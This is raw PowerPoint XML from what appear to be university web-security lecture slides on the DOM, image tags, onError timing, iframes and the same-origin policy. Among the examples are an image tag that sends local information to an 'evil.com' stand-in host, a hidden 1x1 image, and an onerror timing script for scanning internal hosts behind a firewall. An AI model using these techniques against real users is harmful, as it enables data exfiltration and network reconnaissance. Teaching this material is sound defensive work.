              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>		 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>so.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>flashdiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>');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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>	&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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sz="2800" smtClean="0"/>
              <a:t>Reported Web Vulnerabilities "In the Wild"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25500" y="5943600"/>
            <a:ext cx="8089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latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data from aggregator and validator of  NVD-reported vulnerabilities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2359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/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133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Object-oriented interface used to read and write docs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>web page in HTML is structured data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DOM provides representation of this hierarchy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Examples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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  document.write(document.referrer)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Also Browser Object Model (BOM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>window, document, frames[], history, location, navigator (type and version of browser)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Image Tags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6E595C-B8A9-4129-BDA4-5CF617B3E06C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43013" name="Picture 4" descr="beach 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7400" y="5029200"/>
            <a:ext cx="335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Displays this nice picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Security issues?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8251939" cy="18158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dirty="0" smtClean="0"/>
              <a:t>&lt;html&gt;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&lt;p&gt;  … &lt;/p&gt;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=“http://example.com/sunset.gif” height="50" width="100"&gt; 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tag security issues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8522F2-BA83-4287-A1B3-FDFCCF02D90D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036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Communicate with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=“http://evil.com/pass-local-information.jpg?extra_information”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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Hide resulting image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 … ” height=“1" width=“1"&gt;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Spoof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Add logos that fool a user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90600" y="5791200"/>
            <a:ext cx="731520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web page can send information to any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onError</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5222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Basic function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Triggered when error occurs loading a document or an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example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Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> handler if image does not exist and cannot load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3495675"/>
            <a:ext cx="7467600" cy="923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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img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="image.gif" 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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="alert('The image could not be loaded.')“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153150"/>
            <a:ext cx="587216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http://www.w3schools.com/jsref/jsref_onError.asp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timing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5325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/>
              <a:t>Sample code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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p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316162"/>
            <a:ext cx="7467600" cy="3170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&lt;html&gt;&lt;body&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> id="test" style="display: none"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;script&gt;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test = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(’test’);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start = new Date();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test.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> end = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          alert("Total time: " + (end - start));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     test.src = "http://www.example.com/page.html";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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 scanning behind firewall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JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Example:  &lt;img src=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Use timeout/onError to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Fingerprint webapps using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5018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40188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975100" y="3883025"/>
            <a:ext cx="46038" cy="190500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12800" y="3698875"/>
            <a:ext cx="90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pic>
        <p:nvPicPr>
          <p:cNvPr id="50183" name="Picture 8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4279900"/>
            <a:ext cx="1487487" cy="1138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459413" y="4478338"/>
            <a:ext cx="1387475" cy="79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Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page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4211638" y="6477000"/>
            <a:ext cx="104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Firewall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00338" y="3771900"/>
            <a:ext cx="3781425" cy="650875"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50206" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 1280 h 211"/>
                <a:gd name="T2" fmla="*/ 168353 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 315092 w 1197"/>
                <a:gd name="T5" fmla="*/ 1098 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197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" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197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Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="1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1) “show me dancing pigs!”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97113" y="4332288"/>
            <a:ext cx="2976562" cy="709612"/>
            <a:chOff x="1506" y="2539"/>
            <a:chExt cx="1875" cy="447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539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Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1506" y="2813"/>
              <a:ext cx="10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2) “check this out”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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5599113" y="538797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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 17" descr="cisco-520-2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0288" y="5807075"/>
            <a:ext cx="142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953250" y="2874963"/>
            <a:ext cx="1855788" cy="1420812"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50201" name="Picture 11" descr="CompaqAlphaServerES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0" y="1621"/>
              <a:ext cx="72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2" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="3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Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204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981825" y="4876800"/>
            <a:ext cx="1751013" cy="1436688"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50198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55" y="2882"/>
              <a:ext cx="905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9" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="341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Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152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826000" y="5535613"/>
            <a:ext cx="666750" cy="384175"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="473" cy="383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
              <a:ext cx="36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Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="3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146300" y="5214938"/>
            <a:ext cx="3173413" cy="593725"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50194" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095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Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="12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3) port scan results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scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5734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smtClean="0"/>
              <a:t>Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Exchange data between a client-side app running in a browser and server-side app,  without reloading page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Java Applet/ActiveX control/Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Can make HTTP requests and interact with client-side JavaScript code,  but requires LiveConnect (not available on all browsers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>XML-RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>open, standards-based technology that requires XML-RPC libraries on server and in your client-side code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Simple HTTP via a hidden IFRAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>IFRAME with a script on your web server (or database of static HTML files) is by far the easiest of the three remote scripting options  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" smtClean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1515662" y="6443246"/>
            <a:ext cx="6180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See:  http://developer.apple.com/internet/webcontent/iframe.html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143000" y="5638800"/>
            <a:ext cx="6324600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web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can maintain bi-directional communication with browser (until user closes/quits)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4C08035-04FD-45B8-A3AA-04C957743337}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld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Running Remote Code is Risky</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRP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Integrity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Compromise your machine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Install malware rootkit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Transact on your accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Confidentiality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Read your information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Steal passwords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Read your email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19461" name="Picture 7" descr="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24812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 and iFrame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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Window may contain frames from different sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>iFrame: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>iFrame example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Why use frames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Delegate screen area to content from another source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Parent may work even if frame is broken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990600" y="3352800"/>
            <a:ext cx="6858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="hello.html" width=450 height=100&gt;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If you can see this, your browser doesn't understand IFRAME.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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Web application vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20483" name="Picture 2" descr="C:\Documents and Settings\John Mitchell\My Documents\stanford\cs241\IBM JPEGS\fig 13 vul_disclos_web_a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770063"/>
            <a:ext cx="50863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Documents and Settings\John Mitchell\My Documents\stanford\cs241\IBM JPEGS\fig 14 vulns disclosures_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884363"/>
            <a:ext cx="3489325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Interact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Content Placeholder 4" descr="gmail-c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8001000" cy="4833938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A1FAB6-8AD0-4CCD-882B-A9FAE9926EE2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84F1C42-AC66-4039-99E4-846C0801E8B8}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld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Browser Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRP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Run remote web applications safely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Limited access to OS, network, and browser data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Approach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Isolate sites in different security contexts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Browser manages resources, like an OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20485" name="Picture 6" descr="MCj02979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1440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713" y="279400"/>
            <a:ext cx="128428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40188" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean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2011363"/>
            <a:ext cx="4040188" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root exploit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5" y="1371600"/>
            <a:ext cx="4041775" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean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5" y="2011363"/>
            <a:ext cx="4041775" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control</a:t>
            </a:r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Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cache history attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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Safe to visit an evil web site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Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Address bar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-80" charset="-128"/>
              </a:rPr>
              <a:t>	distinguishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Allow safe delegation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3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20701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2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ifram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54102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sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Same Origin Policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795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 = protocol://host:port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
